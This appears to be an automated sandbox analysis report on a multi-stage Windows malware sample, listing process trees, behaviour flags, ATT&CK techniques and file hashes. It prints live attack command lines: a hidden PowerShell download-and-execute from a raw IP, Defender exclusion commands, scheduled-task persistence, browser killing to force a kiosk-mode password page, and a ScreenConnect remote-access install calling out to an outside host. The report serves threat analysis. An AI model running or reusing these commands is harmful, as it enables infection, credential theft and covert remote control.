description pid Process procid_target PID 3060 wrote to memory of 1736 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 3060 wrote to memory of 1736 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 3060 wrote to memory of 1736 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 3060 wrote to memory of 1736 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 3060 wrote to memory of 2408 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 3060 wrote to memory of 2408 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 3060 wrote to memory of 2408 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 3060 wrote to memory of 2408 3060 2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 1736 wrote to memory of 2340 1736 cmd.exe 33 PID 1736 wrote to memory of 2340 1736 cmd.exe 33 PID 1736 wrote to memory of 2340 1736 cmd.exe 33 PID 1736 wrote to memory of 2340 1736 cmd.exe 33 PID 2408 wrote to memory of 2328 2408 mshta.exe 34 PID 2408 wrote to memory of 2328 2408 mshta.exe 34 PID 2408 wrote to memory of 2328 2408 mshta.exe 34 PID 2408 wrote to memory of 2328 2408 mshta.exe 34 PID 2328 wrote to memory of 2992 2328 powershell.exe 36 PID 2328 wrote to memory of 2992 2328 powershell.exe 36 PID 2328 wrote to memory of 2992 2328 powershell.exe 36 PID 2328 wrote to memory of 2992 2328 powershell.exe 36 PID 2992 wrote to memory of 1756 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 37 PID 2992 wrote to memory of 1756 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 37 PID 2992 wrote to memory of 1756 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 37 PID 2992 wrote to memory of 1756 2992 TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE 37 PID 1756 wrote to memory of 2956 1756 rapes.exe 40 PID 1756 wrote to memory of 2956 1756 rapes.exe 40 PID 1756 wrote to memory of 2956 1756 rapes.exe 40 PID 1756 wrote to memory of 2956 1756 rapes.exe 40 PID 2956 wrote to memory of 2064 2956 NP4kBrG.exe 41 PID 2956 wrote to memory of 2064 2956 NP4kBrG.exe 41 PID 2956 wrote to memory of 2064 2956 NP4kBrG.exe 41 PID 2956 wrote to memory of 1384 2956 NP4kBrG.exe 43 PID 2956 wrote to memory of 1384 2956 NP4kBrG.exe 43 PID 2956 wrote to memory of 1384 2956 NP4kBrG.exe 43 PID 2956 wrote to memory of 956 2956 NP4kBrG.exe 45 PID 2956 wrote to memory of 956 2956 NP4kBrG.exe 45 PID 2956 wrote to memory of 956 2956 NP4kBrG.exe 45 PID 2956 wrote to memory of 844 2956 NP4kBrG.exe 47 PID 2956 wrote to memory of 844 2956 NP4kBrG.exe 47 PID 2956 wrote to memory of 844 2956 NP4kBrG.exe 47 PID 2956 wrote to memory of 1952 2956 NP4kBrG.exe 49 PID 2956 wrote to memory of 1952 2956 NP4kBrG.exe 49 PID 2956 wrote to memory of 1952 2956 NP4kBrG.exe 49 PID 1756 wrote to memory of 2672 1756 rapes.exe 54 PID 1756 wrote to memory of 2672 1756 rapes.exe 54 PID 1756 wrote to memory of 2672 1756 rapes.exe 54 PID 1756 wrote to memory of 2672 1756 rapes.exe 54 PID 1756 wrote to memory of 2176 1756 rapes.exe 55 PID 1756 wrote to memory of 2176 1756 rapes.exe 55 PID 1756 wrote to memory of 2176 1756 rapes.exe 55 PID 1756 wrote to memory of 2176 1756 rapes.exe 55 PID 2156 wrote to memory of 1996 2156 taskeng.exe 57 PID 2156 wrote to memory of 1996 2156 taskeng.exe 57 PID 2156 wrote to memory of 1996 2156 taskeng.exe 57 PID 1756 wrote to memory of 1784 1756 rapes.exe 58 PID 1756 wrote to memory of 1784 1756 rapes.exe 58 PID 1756 wrote to memory of 1784 1756 rapes.exe 58 PID 1756 wrote to memory of 1784 1756 rapes.exe 58 PID 1784 wrote to memory of 2492 1784 75c64a5fe4.exe 59 PID 1784 wrote to memory of 2492 1784 75c64a5fe4.exe 59 PID 1784 wrote to memory of 2492 1784 75c64a5fe4.exe 59 PID 1784 wrote to memory of 2492 1784 75c64a5fe4.exe 59 PID 1784 wrote to memory of 1692 1784 75c64a5fe4.exe 61 PID 1784 wrote to memory of 1692 1784 75c64a5fe4.exe 61 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 5ri88maP28C /tr "mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 5ri88maP28C /tr "mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2340
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Local\TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE"C:\Users\Admin\AppData\Local\TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:1952
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381450101\9c32fb17b4.exe"C:\Users\Admin\AppData\Local\Temp\10381450101\9c32fb17b4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2672
-
-
C:\Users\Admin\AppData\Local\Temp\10381460101\0eb65cfefc.exe"C:\Users\Admin\AppData\Local\Temp\10381460101\0eb65cfefc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\10381470101\75c64a5fe4.exe"C:\Users\Admin\AppData\Local\Temp\10381470101\75c64a5fe4.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2348
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1704 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.0.1495202775\702543554" -parentBuildID 20221007134813 -prefsHandle 1272 -prefMapHandle 1260 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1defe146-567b-4be4-841f-f8fd9f4fce5f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1368 45f2758 gpu9⤵PID:1800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.1.164726948\339993801" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1516 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef59b93c-a630-4af4-b6e9-02233eb89de0} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1532 44fb458 socket9⤵PID:568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.2.71304211\1123630119" -childID 1 -isForBrowser -prefsHandle 1892 -prefMapHandle 1888 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6320b6e7-54ff-4297-8a30-f35650186033} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1868 18e4f558 tab9⤵PID:2592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.3.242283499\1856710447" -childID 2 -isForBrowser -prefsHandle 2740 -prefMapHandle 2736 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b800ee98-7bb0-4cb0-8a77-959133ce9a3f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2752 e64558 tab9⤵PID:2996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.4.855048009\1879785595" -childID 3 -isForBrowser -prefsHandle 3812 -prefMapHandle 3808 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0aafb9d-fdde-4b67-ab73-6dc3b0d77f50} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3824 1eeb9e58 tab9⤵PID:564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.5.1251832731\127858260" -childID 4 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d2d8319-a3fd-4b52-8746-d50862ecfd6b} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3920 1eeb9858 tab9⤵PID:1412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.6.1973818061\1873793797" -childID 5 -isForBrowser -prefsHandle 4112 -prefMapHandle 4116 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58f77f72-5461-4a0e-b4f4-e19890cf6b35} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 4100 1ef9ab58 tab9⤵PID:1384
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381480101\9d780b6f18.exe"C:\Users\Admin\AppData\Local\Temp\10381480101\9d780b6f18.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\10381490101\78577724d0.exe"C:\Users\Admin\AppData\Local\Temp\10381490101\78577724d0.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\10381500101\d22426bcf1.exe"C:\Users\Admin\AppData\Local\Temp\10381500101\d22426bcf1.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3880
-
-
C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1700
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3848 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381530101\70d75e69ad.exe"C:\Users\Admin\AppData\Local\Temp\10381530101\70d75e69ad.exe"6⤵
- Executes dropped EXE
PID:3180 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3180 -s 647⤵
- Loads dropped DLL
PID:3216
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381540101\4aa41be87a.exe"C:\Users\Admin\AppData\Local\Temp\10381540101\4aa41be87a.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3368
-
-
C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3864 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3912
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"6⤵PID:936
-
-
-
-
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2236
-
C:\Windows\system32\taskeng.exetaskeng.exe {ACAFAF6F-9758-4683-BA43-61C573FFBF3B} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\smss.exeC:\Users\Admin\AppData\Local\Temp\smss.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Users\Admin\AppData\Local\Temp\smss.exeC:\Users\Admin\AppData\Local\Temp\smss.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3920 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C1A7DC85C0D0DE76A5B67DE9BA51B217 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3676 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC69A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259573448 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3740
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 710C335EDB53381774964B0F5FF8D0CE2⤵PID:1020
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DB8C4DC25386892C1B9CF4859F2436E1 M Global\MSI00002⤵PID:3864
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1744
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005A8" "00000000000005DC"1⤵PID:1448
-
C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=ad6ebbe3-e789-4058-b8c7-24af2c9e25ee&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"1⤵PID:3752
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8452S9S3\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp
Filesize22KB
MD5dbb90d8ccf95ca2e25467dda4deae171
SHA19629d09401e1745410d91a38c7dc2b4b1bcc53d7
SHA256a9e07aea216fe69a21c3eb1f24e94f27b320374cde9385c4bb15823cd5ef9758
SHA51294ae715d4ed903b94af6482ec6bdcc9c080aa6603a7b108d6bc5870b8e399ee958b30ea0fe5bde92ff410ff8e9795e672012bd4293e96ac3c55a2d38b42db096
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
136KB
MD5600c5edb9777e1d279b5f7abd9f6d3ac
SHA18bc7c951070c242d74cf881b0d69ebbe9c9f087d
SHA2562b180bc8878d513a9ecaabf45f011c97e3dd5c2c57dfdddfc26bc3ac13dc47cf
SHA5127349ee35c76e96b359e39a8a3bab2c026631835a7f7b150f07112e875befa072586a86320f4cce99821e5b5de7ae5d4aed5d6d62a687ec037db7f8fc79f692c7
-
Filesize
2.9MB
MD587e1ef76fcf8436dd835e12c500e4e83
SHA1e639e7352e4a21263120988a318f5e9b3dd8a275
SHA256357019ac110c232d6ee370d8ef02822c5963e72584ec7f897381679fe7ab38da
SHA512ab8e05c697f8f332c847e6661623b8f08d0adbbd8e5860accb2a608d1b896c031ea4b840cff4332637710e755108442fa9533375cfb1ec8164958e48acc1ccf3
-
Filesize
1.7MB
MD55dd55b0c5021bf7a1abd5dcff2598695
SHA1d523df50545388ae0465ed4ef58e05c387b38d8d
SHA256143fa09fc53e1bd7eb74d005c66f39a90b87901b69b6ea3209e4c33cf7b70f0c
SHA512a36dd71d4b48a30f0ef92bbbe59d9f1accfe152b7fec9c4f1a3896485bed084963821b5e6cb975bdd69ad3b867ed9c497733583f2e04f0617ebb2d6daef8670b
-
Filesize
950KB
MD5abb7738b0d8041d72718a0358da1d866
SHA16f0a0aeccbab99ab5e06819e48c0a5761e42a1ab
SHA25677b0911b9840fed6e2bb625e00e221adc5b5868198b4916303675154b4b81d5e
SHA51269097dd3019455023f0b142d65ae68525b372e0960d0e9995340ef736461582e459608475b361cb47d97055cc7cbc88642b55f6966ec6461289f92a6406bc0c9
-
Filesize
1.7MB
MD5c5531ef7f8f5936fbaef26e92eff6586
SHA1b29d02e373485971da8fba4093d5b2ecc711b07c
SHA256235dad4176b568a8137525842b7da13817e7685b83b9970839b1c67b8f732c1f
SHA512dc00c684f0f4c5db6c2f3c73fb8906c596c6efa008149b9a8c9db08ec6fc07a9fb409d3d0fc70132032a3f2d58e127d897cdc8005e2da297b221da03b7d27a6f
-
Filesize
1.8MB
MD5242617c7d9c922457ad4ea64cb40f6ea
SHA19725d4a1e476d9fb9d3e0b495fa4796b250470ba
SHA256f7fa8ca1c918f76a3b9057bde8cee2ce5bb6dda1b069cbfc531c513ab6b060c2
SHA512f122a19107afd8d4914bf5997ad64c26468b0a1b2db8802a47345acd7e60d925a41cc4a2fa934a752b021ba7b8cefa886c16ca728da01ce21942d6e91675a6ab
-
Filesize
480KB
